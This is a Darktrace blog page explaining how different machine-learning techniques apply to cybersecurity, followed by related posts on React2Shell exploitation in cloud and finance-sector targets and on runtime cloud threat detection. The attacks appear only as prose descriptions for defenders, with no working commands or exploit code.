Blog
/
/
February 10, 2025

From Hype to Reality: How AI is Transforming Cybersecurity Practices

AI hype is everywhere, but not many vendors are getting specific. Darktrace’s multi-layered AI combines various machine learning techniques for behavioral analytics, real-time threat detection, investigation, and autonomous response.
No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
10
Feb 2025

AI is everywhere, predominantly because it has changed the way humans interact with data. AI is a powerful tool for data analytics, predictions, and recommendations, but accuracy, safety, and security are paramount for operationalization.

In cybersecurity, AI-powered solutions are becoming increasingly necessary to keep up with modern business complexity and this new age of cyber-threat, marked by attacker innovation, use of AI, speed, and scale. The emergence of these new threats calls for a varied and layered approach in AI security technology to anticipate asymmetric threats.

While many cybersecurity vendors are adding AI to their products, they are not always communicating the capabilities or data used clearly. This is especially the case with Large Language Models (LLMs). Many products are adding interactive and generative capabilities which do not necessarily increase the efficacy of detection and response but rather are aligned with enhancing the analyst and security team experience and data retrieval.

Consequently, many  people erroneously conflate generative AI with other types of AI. Similarly, only 31% of security professionals report that they are “very familiar” with supervised machine learning, the type of AI most often applied in today’s cybersecurity solutions to identify threats using attack artifacts and facilitate automated responses. This confusion around AI and its capabilities can result in suboptimal cybersecurity measures, overfitting, inaccuracies due to ineffective methods/data, inefficient use of resources, and heightened exposure to advanced cyber threats.

Vendors must cut through the AI market and demystify the technology in their products for safe, secure, and accurate adoption. To that end, let’s discuss common AI techniques in cybersecurity as well as how Darktrace applies them.

Modernizing cybersecurity with AI

Machine learning has presented a significant opportunity to the cybersecurity industry, and many vendors have been using it for years. Despite the high potential benefit of applying machine learning to cybersecurity, not every AI tool or machine learning model is equally effective due to its technique, application, and data it was trained on.

Supervised machine learning and cybersecurity

Supervised machine models are trained on labeled, structured data to facilitate automation of a human-led trained tasks. Some cybersecurity vendors have been experimenting with supervised machine learning for years, with most automating threat detection based on reported attack data using big data science, shared cyber-threat intelligence, known or reported attack behavior, and classifiers.

In the last several years, however, more vendors have expanded into the behavior analytics and anomaly detection side. In many applications, this method separates the learning, when the behavioral profile is created (baselining), from the subsequent anomaly detection. As such, it does not learn continuously and requires periodic updating and re-training to try to stay up to date with dynamic business operations and new attack techniques. Unfortunately, this opens the door for a high rate of daily false positives and false negatives.

Unsupervised machine learning and cybersecurity

Unlike supervised approaches, unsupervised machine learning does not require labeled training data or human-led training. Instead, it independently analyzes data to detect compelling patterns without relying on knowledge of past threats. This removes the dependency of human input or involvement to guide learning.

However, it is constrained by input parameters, requiring a thoughtful consideration of technique and feature selection to ensure the accuracy of the outputs. Additionally, while it can discover patterns in data as they are anomaly-focused, some of those patterns may be irrelevant and distracting.

When using models for behavior analytics and anomaly detection, the outputs come in the form of anomalies rather than classified threats, requiring additional modeling for threat behavior context and prioritization. Anomaly detection performed in isolation can render resource-wasting false positives.

LLMs and cybersecurity

LLMs are a major aspect of mainstream generative AI, and they can be used in both supervised and unsupervised ways. They are pre-trained on massive volumes of data and can be applied to human language, machine language, and more.

With the recent explosion of LLMs in the market, many vendors are rushing to add generative AI to their products, using it for chatbots, Retrieval-Augmented Generation (RAG) systems, agents, and embeddings. Generative AI in cybersecurity can optimize data retrieval for defenders, summarize reporting, or emulate sophisticated phishing attacks for preventative security.

But, since this is semantic analysis, LLMs can struggle with the reasoning necessary for security analysis and detection consistently. If not applied responsibly, generative AI can cause confusion by “hallucinating,” meaning referencing invented data, without additional post-processing to decrease the impact or by providing conflicting responses due to confirmation bias in the prompts written by different security team members.

Combining techniques in a multi-layered AI approach

Each type of machine learning technique has its own set of strengths and weaknesses, so a multi-layered, multi-method approach is ideal to enhance functionality while overcoming the shortcomings of any one method.

Darktrace’s Self-Learning AI is a multi-layered engine is powered by multiple machine learning approaches, which operate in combination for cyber defense. This allows Darktrace to protect the entire digital estates of the organizations it secures, including corporate networks, cloud computing services, SaaS applications, IoT, Industrial Control Systems (ICS), and email systems.

Plugged into the organization’s infrastructure and services, our AI engine ingests and analyzes the raw data and its interactions within the environment and forms an understanding of the normal behavior, right down to the granular details of specific users and devices. The system continually revises its understanding about what is normal based on evolving evidence, continuously learning as opposed to baselining techniques.

This dynamic understanding of normal partnered with dozens of anomaly detection models means that the AI engine can identify, with a high degree of precision, events or behaviors that are both anomalous and unlikely to be benign. Understanding anomalies through the lens of many models as well as autonomously fine-tuning the models’ performances gives us a higher understanding and confidence in anomaly detection.

The next layer provides event correlation and threat behavior context to understand the risk level of an anomalous event(s). Every anomalous event is investigated by Cyber AI Analyst that uses a combination of unsupervised machine learning models to analyze logs with supervised machine learning trained on how to investigate. This provides anomaly and risk context along with investigation outcomes with explainability.

The ability to identify activity that represents the first footprints of an attacker, without any prior knowledge or intelligence, lies at the heart of the AI system’s efficacy in keeping pace with threat actor innovations and changes in tactics and techniques. It helps the human team detect subtle indicators that can be hard to spot amid the immense noise of legitimate, day-to-day digital interactions. This enables advanced threat detection with full domain visibility.

Digging deeper into AI: Mapping specific machine learning techniques to cybersecurity functions

Visibility and control are vital for the practical adoption of AI solutions, as it builds trust between human security teams and their AI tools. That is why we want to share some specific applications of AI across our solutions, moving beyond hype and buzzwords to provide grounded, technical explanations.

Darktrace’s technology helps security teams cover every stage of the incident lifecycle with a range of comprehensive analysis and autonomous investigation and response capabilities.

  1. Behavioral prediction: Our AI understands your unique organization by learning normal patterns of life. It accomplishes this with multiple clustering algorithms, anomaly detection models, Bayesian meta-classifier for autonomous fine-tuning, graph theory, and more.
  2. Real-time threat detection: With a true understanding of normal, our AI engine connects anomalous events to risky behavior using probabilistic models. 
  3. Investigation: Darktrace performs in-depth analysis and investigation of anomalies, in particular automating Level 1 of a SOC team and augmenting the rest of the SOC team through prioritization for human-led investigations. Some of these methods include supervised and unsupervised machine learning models, semantic analysis models, and graph theory.
  4. Response: Darktrace calculates the proportional action to take in order to neutralize in-progress attacks at machine speed. As a result, organizations are protected 24/7, even when the human team is out of the office. Through understanding the normal pattern of life of an asset or peer group, the autonomous response engine can isolate the anomalous/risky behavior and surgically block. The autonomous response engine also has the capability to enforce the peer group’s pattern of life when rare and risky behavior continues.
  5. Customizable model editor: This layer of customizable logic models tailors our AI’s processing to give security teams more visibility as well as the opportunity to adapt outputs, therefore increasing explainability, interpretability, control, and the ability to modify the operationalization of the AI output with auditing.

See the complete AI architecture in the paper “The AI Arsenal: Understanding the Tools Shaping Cybersecurity.”

Figure 1. Alerts can be customized in the model editor in many ways like editing the thresholds for rarity and unusualness scores above.

Machine learning is the fundamental ally in cyber defense

Traditional security methods, even those that use a small subset of machine learning, are no longer sufficient, as these tools can neither keep up with all possible attack vectors nor respond fast enough to the variety of machine-speed attacks, given their complexity compared to known and expected patterns.

Security teams require advanced detection capabilities, using multiple machine learning techniques to understand the environment, filter the noise, and take action where threats are identified.

Darktrace’s Self-Learning AI comes together to achieve behavioral prediction, real-time threat detection and response, and incident investigation, all while empowering your security team with visibility and control.

Learn how AI is Applied in Cybersecurity

Discover specifically how Darktrace applies different types of AI to improve cybersecurity efficacy and operations in this technical paper.

No items found.
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
No items found.

More in this series

No items found.

Blog

/

/

January 15, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly

React2Shell Default blog imageDefault blog image

Introduction

Last month’s disclosure of CVE 2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.  

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE 2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction.  No phishing campaign, no credential theft, and no lateral movement are required; only an exposed service and exploitable condition.

The activity Darktrace observed during the React2shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or to burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMrig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark

The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.
Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. This directly ties the payload execution to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was availability on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korean affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRat, a previously undocumented Linux implant, highlights the need for updated rules and signatures for organizations that rely on them.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.

Read more finance‑sector insights in Darktrace’s white paper, The State of Cyber Security in the Finance Sector.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online, demonstrating how automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting reflects a mature, well‑resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO

Blog

/

/

January 13, 2026

Runtime Is Where Cloud Security Really Counts: The Importance of Detection, Forensics and Real-Time Architecture Awareness

runtime, cloud security, cnaapDefault blog imageDefault blog image

Introduction: Shifting focus from prevention to runtime

Cloud security has spent the last decade focused on prevention; tightening configurations, scanning for vulnerabilities, and enforcing best practices through Cloud Native Application Protection Platforms (CNAPP). These capabilities remain essential, but they are not where cloud attacks happen.

Attacks happen at runtime: the dynamic, ephemeral, constantly changing execution layer where applications run, permissions are granted, identities act, and workloads communicate. This is also the layer where defenders traditionally have the least visibility and the least time to respond.

Today’s threat landscape demands a fundamental shift. Reducing cloud risk now requires moving beyond static posture and CNAPP only approaches and embracing realtime behavioral detection across workloads and identities, paired with the ability to automatically preserve forensic evidence. Defenders need a continuous, real-time understanding of what “normal” looks like in their cloud environments, and AI capable of processing massive data streams to surface deviations that signal emerging attacker behavior.

Runtime: The layer where attacks happen

Runtime is the cloud in motion — containers starting and stopping, serverless functions being called, IAM roles being assumed, workloads auto scaling, and data flowing across hundreds of services. It’s also where attackers:

  • Weaponize stolen credentials
  • Escalate privileges
  • Pivot programmatically
  • Deploy malicious compute
  • Manipulate or exfiltrate data

The challenge is complex: runtime evidence is ephemeral. Containers vanish; critical process data disappears in seconds. By the time a human analyst begins investigating, the detail required to understand and respond to the alert, often is already gone. This volatility makes runtime the hardest layer to monitor, and the most important one to secure.

What Darktrace / CLOUD Brings to Runtime Defence

Darktrace / CLOUD is purpose-built for the cloud execution layer. It unifies the capabilities required to detect, contain, and understand attacks as they unfold, not hours or days later. Four elements define its value:

1. Behavioral, real-time detection

The platform learns normal activity across cloud services, identities, workloads, and data flows, then surfaces anomalies that signify real attacker behavior, even when no signature exists.

2. Automated forensic level artifact collection

The moment Darktrace detects a threat, it can automatically capture volatile forensic evidence; disk state, memory, logs, and process context, including from ephemeral resources. This preserves the truth of what happened before workloads terminate and evidence disappears.

3. AI-led investigation

Cyber AI Analyst assembles cloud behaviors into a coherent incident story, correlating identity activity, network flows, and Cloud workload behavior. Analysts no longer need to pivot across dashboards or reconstruct timelines manually.

4. Live architectural awareness

Darktrace continuously maps your cloud environment as it operates; including services, identities, connectivity, and data pathways. This real-time visibility makes anomalies clearer and investigations dramatically faster.

Together, these capabilities form a runtime-first security model.

Why CNAPP alone isn’t enough

CNAPP platforms excel at pre deployment checks all the way down to developer workstations, identifying misconfigurations, concerning permission combinations, vulnerable images, and risky infrastructure choices. But CNAPP’s breadth is also its limitation. CNAPP is about posture. Runtime defense is about behavior.

CNAPP tells you what could go wrong; runtime detection highlights what is going wrong right now.

It cannot preserve ephemeral evidence, correlate active behaviors across domains, or contain unfolding attacks with the precision and speed required during a real incident. Prevention remains essential, but prevention alone cannot stop an attacker who is already operating inside your cloud environment.

Real-world AWS Scenario: Why Runtime Monitoring Wins

A recent incident detected by Darktrace / CLOUD highlights how cloud compromises unfold, and why runtime visibility is non-negotiable. Each step below reflects detections that occur only when monitoring behavior in real time.

1. External Credential Use

Detection: Unusual external source for credential use: An attacker logs into a cloud account from a never-before-seen location, the earliest sign of account takeover.

2. AWS CLI Pivot

Detection: Unusual CLI activity: The attacker switches to programmatic access, issuing commands from a suspicious host to gain automation and stealth.

3. Credential Manipulation

Detection: Rare password reset: They reset or assign new passwords to establish persistence and bypass existing security controls.

4. Cloud Reconnaissance

Detection: Burst of resource discovery: The attacker enumerates buckets, roles, and services to map high value assets and plan next steps.

5. Privilege Escalation

Detection: Anomalous IAM update: Unauthorized policy updates or role changes grant the attacker elevated access or a backdoor.

6. Malicious Compute Deployment

Detection: Unusual EC2/Lambda/ECS creation: The attacker deploys compute resources for mining, lateral movement, or staging further tools.

7. Data Access or Tampering

Detection: Unusual S3 modifications: They alter S3 permissions or objects, often a prelude to data exfiltration or corruption.

Only some of these actions would appear in a posture scan, crucially after the fact.
Every one of these runtime detections is visible only through real-time behavioral monitoring while the attack is in progress.

The future of cloud security Is runtime-first

Cloud defense can no longer revolve solely around prevention. Modern attacks unfold in runtime, across a fast-changing mesh of workloads, services, and — critically — identities. To reduce risk, organizations must be able to detect, understand, and contain malicious activity as it happens, before ephemeral evidence disappears and before attacker's pivot across identity layers.

Darktrace / CLOUD delivers this shift by turning runtime, the most volatile and consequential layer in the cloud, into a fully defensible control point through unified visibility across behavior, workloads, and identities. It does this by providing:

  • Real-time behavior detection across workloads and identity activity
  • Autonomous response actions for rapid containment
  • Automated forensic level artifact preservation the moment events occur
  • AI-driven investigation that separates weak signals from true attacker patterns
  • Live cloud environment insight to understand context and impact instantly

Cloud security must evolve from securing what might go wrong to continuously understanding what is happening; in runtime, across identities, and at the speed attackers operate. Unifying runtime and identity visibility is how defenders regain the advantage.

[related-resource]

Continue reading
About the author
Adam Stevens
Senior Director of Product, Cloud | Darktrace
Your data. Our AI.
Elevate your network security with Darktrace AI